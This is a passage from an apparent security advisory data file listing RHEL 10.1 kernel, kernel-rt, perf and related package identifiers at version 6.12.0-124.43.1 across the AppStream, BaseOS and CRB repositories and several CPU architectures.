"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
